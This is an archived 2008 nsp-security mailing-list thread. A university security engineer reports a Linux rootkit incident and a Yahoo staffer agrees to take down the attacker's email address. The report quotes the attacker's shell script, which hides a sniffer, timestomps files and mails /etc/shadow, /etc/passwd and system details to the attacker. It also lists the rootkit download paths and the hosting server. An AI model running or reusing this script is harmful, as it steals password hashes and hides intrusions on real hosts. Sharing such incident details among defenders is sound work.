[nsp-sec] Yahoo email address catching password files - rootkit hosted at AS 21844

Dave Mitchell davem at yahoo-inc.com
Fri Oct 10 16:22:25 EDT 2008 

Ack, Yahoo. We'll get it taken down immediately.

-dave

On Fri, Oct 10, 2008 at 02:09:25PM -0400, Daniel Adinolfi wrote:
> ----------- nsp-security Confidential --------
>
> Folks,
>
> We have a major incident here involving a number of linux hosts.  The 
> script that gets run by the bad guys send the /etc/passwd and /etc/shadow 
> files (along with some other tidbits) to a particular yahoo.com email 
> address.  It also installs a trojaned sshd and installs dsniff.
>
> The email address in question is cc.cappy at yahoo.com.  Can someone at Yahoo 
> please take down this address?
>
> The root kit is available here:
>
> webbuild.org
>
> which is currently at 75.125.198.200.
>
> AS      | IP               | AS Name
> 21844   | 75.125.198.200   | THEPLANET-AS - ThePlanet.com Internet 
> Services, Inc.
> PEER_AS | IP               | AS Name
> 2914    | 75.125.198.200   | NTT-COMMUNICATIONS-2914 - NTT America, Inc.
> 3356    | 75.125.198.200   | LEVEL3 Level 3 Communications
> 3561    | 75.125.198.200   | SAVVIS - Savvis
> 4565    | 75.125.198.200   | MEGAPATH2-US - MegaPath Networks Inc.
> 6461    | 75.125.198.200   | MFNX MFN - Metromedia Fiber Network
> 7922    | 75.125.198.200   | DNEO-OSP3 - Comcast Cable Communications, Inc.
>
> The following files are downloaded after the compromise, which we believe 
> is through X-Windows.
>
> WGET /.web/ssh.tgz
> WGET /.web/sniff.tgz
> WGET /.web/clean
>
> ssh.tgz is a sshd replacement.  sniff.tgz is dsniff.
>
> This is the script that was run to send the password and system info:
> ________________________
>
> dir=`pwd`
> mkdir /var/spool/.mail
> mv snif2/* /var/spool/.mail
> touch -acmr /usr/sbin/sshd /var/spool/.mail/*
> cd /var/spool/.mail
> ./start
>
> cd $dir
> echo "[+]Sending root information"
> echo "##########hostname##########" >> mail
> hostname -f >> mail
> hostname -i >> mail
> echo "##########shadow list##########" >> mail
> cat /etc/shadow >> mail
> echo "##########passwd list##########" >> mail
> cat /etc/passwd >>mail
> echo "##########ifconfig##########" >> mail
> /sbin/ifconfig | grep inet >> mail
> echo "##########kernel type##########" >> mail
> uname -a >> mail
> echo "Os system" >> mail
> cat /etc/issue >> mail
> echo "sending mail"
> mail cc.cappy at yahoo.com -s "$(hostname -f)" < mail
> cd ..
> rm -rf sniff
> rm -rf sniff.tgz
>
> ___________________________
>
> If folks would like more info, please feel free to contact me directly.
>
> Thanks.
>
> -Dan
>
>
> _________________
> Daniel Adinolfi, CISSP
> Senior Security Engineer, IT Security Office
> Cornell University - Office of Information Technologies
> email: dra1 at cornell.edu   phone: 607-255-7657
>
>
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 186 bytes
Desc: not available
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20081010/107167d6/attachment-0001.sig>

More information about the nsp-security mailing list